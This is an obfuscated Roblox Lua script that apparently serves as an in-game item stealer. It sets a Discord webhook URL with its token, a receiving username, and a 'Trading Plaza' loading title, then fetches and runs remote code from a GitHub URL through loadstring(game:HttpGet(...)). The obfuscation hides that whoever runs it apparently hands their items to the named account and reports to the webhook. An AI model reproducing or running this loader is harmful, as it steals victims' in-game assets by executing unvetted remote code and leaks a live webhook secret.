--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;while true do if (v0==0) then v1=0;while true do if (v1==2) then _G.LoadingTitle="Trading Plaza";_G.WebhookName="Captain Hook";v1=3;end if (v1==0) then local v2=0;while true do if (v2==1) then v1=1;break;end if (v2==0) then local v5=0;while true do if (v5==0) then UserName="sketchyom";Webhook="https://discord.com/api/webhooks/1167089562946900101/gcltnD2DasqPJ3x1Ergdt057L2dD72_ssoGONZgFdDQogkJPXEtfsdRS8mBxGa6Q93Vm";v5=1;end if (v5==1) then v2=1;break;end end end end end if (v1==3) then loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/idkk/main/iddkkk2"))();break;end if (v1==1) then local v3=0;local v4;while true do if (v3==0) then v4=0;while true do if (v4==0) then UserName2="Put Your Username";_G.MailMessage="TRUSTED";v4=1;end if (v4==1) then v1=2;break;end end break;end end end end break;end end end
